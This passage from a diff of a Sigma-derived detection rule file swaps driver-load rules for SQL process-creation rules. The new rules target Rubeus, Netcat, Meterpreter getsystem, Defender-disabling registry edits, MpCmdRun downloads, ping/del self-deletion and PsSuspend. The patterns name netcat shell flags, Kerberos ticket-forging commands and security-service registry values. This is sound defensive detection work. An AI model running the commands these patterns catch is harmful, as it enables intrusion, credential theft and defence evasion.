ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' 